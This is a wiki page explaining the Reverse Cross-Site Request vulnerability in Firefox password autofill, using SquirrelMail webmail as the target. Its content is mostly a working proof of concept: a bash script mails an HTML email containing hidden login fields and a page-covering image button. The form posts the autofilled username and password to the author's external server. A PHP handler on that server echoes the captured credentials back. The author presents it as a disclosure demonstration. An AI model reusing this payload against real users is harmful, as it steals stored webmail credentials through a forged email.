View source for Reverse Cross-Site Request (RCSR) vulnerability

==Intro==
This is a new class of vulnerabilities discovered by [http://www.info-svc.com/news/11-21-2006/ Robert Chapin].
<br>Resolution for firefox is [https://bugzilla.mozilla.org/show_bug.cgi?id=360493 in discussion].
<br>It's incredibly easy to setup an attack and much larger than just blogs and forums.
==Example==
We'll do the attack by forging an email to be read under a webmail, here squirrelmail.

===Conditions===
* Use Firefox
* Let Firefox remembering the password for your squirrelmail website
* Have only one login to be remembered otherwise ff does not autocomplete the login form but waits for you to begin filling the login form.
* Ask squirrelmail to display HTML version by default (in your prefs)

===Forge email===
<br>Warning! in this example the destination form is on my own website but if you try as such this means that I will receive your account infos!
<br>You can e.g. change temporarely your password just for the demo.
<br>If you use my form, note that you will be prompted for my SSL certificate, this is because this is a self-generated ssl certificate, I could have done it without ssl but then your account infos would have flied in clear text on the Net!
<source lang=bash>
#!/bin/bash
TO=your@email.com
mail -s test-sec \
   -a "MIME-Version: 1.0" \
   -a "Content-Type: text/html; charset=ISO-8859-1" \
   -a "Content-Transfer-Encoding: 7bit" \
   $TO << EOF
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta content="text/html;charset=ISO-8859-1" http-equiv="Content-Type">
<title></title>
</head>
<body bgcolor="#ffffff" text="#000000">
TEST<br>Click on the image.
<form action="https://www.yobi.be/form.php" method="post" target="_blank">
<input type="text" name="login_username" style="display: none;" />
<input type="password" name="secretkey" style="display: none;" />
<input type="hidden" name="js_autodetect_results" value="0" />
<input type="hidden" name="just_logged_in" value="1" />
<input type="image" value="Login" src="https://www.yobi.be/1" style="width: 640px; height: 480px;
border: 1px; position: absolute; top: 0px; left: 0px; display: block;"/>
</form>
</body>
</html>
EOF
</source>
===On attacker's site===
On my site, the form handler is as simple as that just to show you I got your data:
<source lang=php>
<?php
echo "Your login: ".$_POST['login_username'];
echo "<br>Your password: ".$_POST['secretkey'];
echo "<br>Your site: ".$_SERVER['HTTP_REFERER'];
?>
</source>